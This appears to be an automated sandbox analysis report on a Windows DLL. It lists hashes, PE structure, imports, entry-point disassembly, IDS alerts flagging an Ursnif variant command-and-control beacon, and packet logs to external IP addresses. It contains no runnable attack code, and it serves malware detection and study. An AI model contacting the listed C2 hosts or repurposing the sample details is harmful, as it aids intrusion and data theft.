SHA-512: | EB660C6A09D0566935FF383D15F6A68C0BD0F45D6ED35D7708913C9F4CFEF59CA4067BB52766BF798DF02292E41019A6CD004767FB628AF9BE44272CDAA44B1D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.263922468747438 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxC10zxs7+AEszIWXp+N23fxCdx:p37Lvkmb6KHpC10WZE8pCdx |
MD5: | 26231D50B2E9AE0CA2486C11856271F6 |
SHA1: | D298368A287C8C654C2AD890F58E1101C89C6EA8 |
SHA-256: | 835E5B1E3D6F2806D2371B4160EACC27A46F424879338811A286CAC5D101BB9A |
SHA-512: | 45534EB37809F3DBBF99142A0E0C72BF02C0715C39A05DA35955F112BA8AA167A05DCBE595D4A14A44D011190CA91BC6902D8B0C39B5E3AEDDAAEC208B65F239 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.5937782577305875 |
Encrypted: | false |
SSDEEP: | 24:etGStE/u2Bg85z7xlfwZD6BgdWqtkZfrOHWI+ycuZhNNVakSiaPNnq:6ttYb5hFCD6MWdJr11ulNVa3iWq |
MD5: | 3D1BB357CA2468341DC1D0CD0CBDE50C |
SHA1: | E3012818931B5770C9EEE1842C196200084ED3B6 |
SHA-256: | 33F58C94D43F3F42D1A83E10568235E6BEB88B6A89634140390607FC845AF545 |
SHA-512: | 4D01A41FDBB5375DC04F659F6EE2499F0A3F27F650BE8F7CBCC7ED0136BE8D19CA31E003700B4D3B1F14AF6745AD9EB50AD4F82082FFFD9589DAF184790FBB6A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.323727982984064 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KHiE8EUKaM5DqBVKVrdFAMBJTH:Akka6AiE8dKxDcVKdBJj |
MD5: | 38B9762A37D60558FC21EF41B824F2A0 |
SHA1: | 4E987BFAEC62799D5483B2E8F93A3020C751FC30 |
SHA-256: | B946DFDE616FFF8EC403135CE6C2AE909E6A48C983880262A3307DC9140F69AA |
SHA-512: | 6FEB9920BB44D00C561F65DD97E3FA15AF546ACEC2B5656F6DF711F1FB03073F9289265F83ED7DCE5364B94AEC7D28AFB1F78F16D4F61353547841EF80B6D914 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220526\PowerShell_transcript.530978.TCpPiQsC.20220526040704.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1367 |
Entropy (8bit): | 5.3900988864716135 |
Encrypted: | false |
SSDEEP: | 24:BxSA/DoCxvBnKx2DOXUW/pvLCHcKo4qWFHjeTKKjX4CIym1ZJXnDfpvLCHcKo4AO:BZ/c+vhKoOfpMlo4tFqDYB1ZJrpMlo4P |
MD5: | AEBC39EB79C9C79BE09DC92C39A235C9 |
SHA1: | 68CD50B3E46C3D14867EA2E6C7B2CFF6AF055B18 |
SHA-256: | 4E4703A45109ADCD12197DDC332C84B45AFCA38DDE5B515A31CB93F31D694F65 |
SHA-512: | 4E2E2D52A15D894753F12CBEAEA480C3787D30888CBDC2957688617DD2C4A1E442290E86E4E8678A262762B1564C679046BDA7FE48ED5F4AFA866F2F1232A91B |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.281218339920859 |
TrID: |
|
File name: | lokvQRcUe0.dll |
File size: | 438272 |
MD5: | 5de5e3440620950f0be99fc6728c7afe |
SHA1: | 43cbdfe6773ce518847b89f177a555e6bece283b |
SHA256: | 2d83e172a42b032b32606b203f2a1a9736acfd86e76ede8ff57b3292c035d139 |
SHA512: | 674a545d51127efec4ad74ff97d6836a5a7c3f6c186de5a0be18bd1c619de4ffcd166409f52624b046ce4e48a0c432c2e19f6008741b8f117434229121f05c0e |
SSDEEP: | 6144:SKmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:SsBUSzjLIRBMkf9dHLpKepKr6CvXG |
TLSH: | 1C94F14897685D66D84647370CE1931EFCE7FE2EE63B7ABE20642C8FF95B0104516B0A |
File Content Preview: | MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401520 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3EC34607 [Thu May 15 07:47:19 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 8000dfa78ad003480e4532227762516a |
Instruction |
---|
push ebp |
mov ebp, esp |
inc edx |
add ecx, FFFFFFFFh |
call 00007F5484979D7Ah |
pop eax |
pop eax |
mov dword ptr [004136F4h], eax |
mov edx, dword ptr [00413810h] |
sub edx, 00005289h |
call edx |
mov eax, ebx |
mov dword ptr [004136F0h], eax |
mov eax, esi |
mov dword ptr [004136E8h], eax |
mov dword ptr [004136F8h], ebp |
mov dword ptr [004136ECh], edi |
add dword ptr [004136F8h], 00000004h |
loop 00007F5484979D27h |
mov dword ptr [ebp+00h], eax |
nop |
nop |
mov ah, 03h |
sbb byte ptr [ebp+6Fh], FFFFFF82h |
and dword ptr [ecx+0Bh], esp |
out D4h, al |
or cl, byte ptr [esi] |
mov eax, dword ptr [0B7E1EADh] |
in eax, dx |
shr dword ptr [edi-49h], 1 |
push ebx |
movsd |
jmp 00007F540FFF410Bh |
imul dh |
mov eax, dword ptr [F34D615Bh] |
call 00007F5417E6CD1Ch |
xlatb |
pop esp |
cmp dl, dh |
salc |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830485026042 | data | 1.12968558601 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0xbea | 0x1000 | False | 0.286865234375 | data | 4.80937731513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380004882812 | data | 5.99890283293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ |
.reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x61360 | 0x666 | data | English | United States |
RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x687d0 | 0xea8 | data | English | United States |
RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6a540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6a660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6ab58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States |
RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount |
msvcrt.dll | fgetwc, strcoll |
USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn |
GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape |
OLEAUT32.dll | LoadTypeLibEx |
KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
192.168.2.313.107.42.1649743802033203 05/26/22-04:06:31.790854 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49743 | 80 | 192.168.2.3 | 13.107.42.16 |
192.168.2.3176.10.119.6849752802033204 05/26/22-04:06:53.058632 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
192.168.2.3176.10.119.6849752802033203 05/26/22-04:06:53.058632 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 26, 2022 04:06:52.060287952 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.072685957 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.072798014 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.073632002 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.086468935 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343399048 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343425989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343440056 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343517065 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.343854904 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343890905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343904972 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.343909979 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.343935013 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.344276905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344316006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344330072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344345093 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.344388962 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.344424963 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344470024 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.344547987 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344567060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344579935 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344593048 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.344623089 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.344721079 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.344774008 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.356909990 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357070923 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357367039 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357388973 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357405901 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357419014 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357441902 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357506037 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357597113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357635975 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357647896 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357669115 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357677937 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357682943 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357709885 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357840061 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357858896 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357875109 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.357887983 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357920885 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.357949018 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358002901 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358036041 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358050108 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.358055115 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358068943 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358078003 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.358117104 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.358325958 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358365059 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358388901 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.358405113 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358416080 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.358417988 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.358447075 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.370215893 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.370299101 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371227980 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371252060 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371268034 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371328115 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371368885 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371383905 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371387005 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371428967 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371567965 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371601105 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371619940 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371623993 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371646881 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371887922 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371906996 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371923923 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371941090 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371942997 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371956110 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371973991 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.371975899 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.371992111 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.372004032 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.372023106 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.372050047 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.372210026 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.372240067 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.372258902 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.372260094 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.372272968 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.372286081 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.372330904 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.382575989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.382766008 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.383284092 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.383305073 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.383322954 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.383338928 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.383352995 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.383368969 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.383416891 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.384627104 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384645939 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384656906 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384722948 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.384936094 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384954929 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384973049 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384990931 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.384999037 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.385009050 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385026932 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385039091 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385065079 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.385107040 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.385507107 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385529995 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385545969 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385557890 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.385565042 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385581970 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385592937 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.385601044 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385616064 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.385639906 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.395011902 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.395083904 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.398720980 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.398741007 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.398760080 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.398772955 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.398808956 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.398844004 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.398974895 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.398992062 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399008989 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399024010 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399025917 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399058104 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399071932 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399090052 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399105072 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399116993 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399158955 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399415016 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399449110 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
May 26, 2022 04:06:52.399475098 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399507046 CEST | 49752 | 80 | 192.168.2.3 | 176.10.119.68 |
May 26, 2022 04:06:52.399513006 CEST | 80 | 49752 | 176.10.119.68 | 192.168.2.3 |
